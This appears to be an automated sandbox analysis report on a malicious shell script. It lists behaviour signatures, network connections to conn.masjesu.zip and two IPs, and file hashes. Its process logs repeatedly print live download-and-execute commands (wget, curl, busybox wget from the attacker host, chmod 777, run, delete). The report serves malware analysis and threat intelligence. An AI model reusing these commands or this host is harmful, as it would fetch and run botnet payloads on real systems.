Analysis Overview
SHA256
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30
Threat Level: Shows suspicious behavior
The file b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-21 01:39
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-21 01:39
Reported
2024-10-21 01:41
Platform
debian9-mipsel-20240729-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c | /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c | N/A |
| N/A | /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F | /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F | N/A |
| N/A | /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 | /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 | N/A |
| N/A | /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt | /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt | N/A |
| N/A | /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL | /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL | N/A |
| N/A | /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI | /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI | N/A |
| N/A | /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH | /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH | N/A |
| N/A | /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG | /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG | N/A |
| N/A | /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx | /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx | N/A |
| N/A | /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB | /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB | N/A |
| N/A | /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW | /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW | N/A |
| N/A | /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW | /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW | N/A |
| N/A | /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst | /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst | N/A |
| N/A | /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI | /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI | N/A |
| N/A | /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB | /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG | /usr/bin/curl | N/A |
Processes
/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
[/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/bin/chmod
[chmod 777 T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c
[./T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/bin/rm
[rm T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]
/bin/chmod
[chmod 777 LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]
/tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F
[./LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]
/bin/rm
[rm LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]
/bin/chmod
[chmod 777 rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]
/tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6
[./rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]
/bin/rm
[rm rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]
/bin/chmod
[chmod 777 LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]
/tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt
[./LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]
/bin/rm
[rm LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]
/bin/chmod
[chmod 777 PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]
/tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL
[./PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]
/bin/rm
[rm PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]
/bin/chmod
[chmod 777 lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]
/tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI
[./lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]
/bin/rm
[rm lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]
/bin/chmod
[chmod 777 MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]
/tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH
[./MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]
/bin/rm
[rm MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]
/bin/chmod
[chmod 777 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]
/tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG
[./5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]
/bin/rm
[rm 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]
/bin/chmod
[chmod 777 PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]
/tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx
[./PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]
/bin/rm
[rm PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/bin/chmod
[chmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB
[./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/bin/rm
[rm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
/bin/chmod
[chmod 777 z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
/tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW
[./z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
/bin/rm
[rm z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]
/bin/chmod
[chmod 777 ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]
/tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW
[./ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]
/bin/rm
[rm ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]
/bin/chmod
[chmod 777 Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]
/tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst
[./Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]
/bin/rm
[rm Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]
/bin/chmod
[chmod 777 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]
/tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI
[./8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]
/bin/rm
[rm 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/bin/chmod
[chmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB
[./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/bin/rm
[rm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
/tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
/tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt
| MD5 | 546071c6a6aeff34580b4d1a9b35a7c3 |
| SHA1 | dc2de298837a86d3bc86e8a328411229d9eccdb6 |
| SHA256 | 2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12 |
| SHA512 | 207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7 |
/tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-21 01:39
Reported
2024-10-21 01:41
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
148s
Max time network
129s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Processes
/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
[/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 151.101.193.91:443 | tcp | |
| GB | 89.187.167.3:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp |
Files
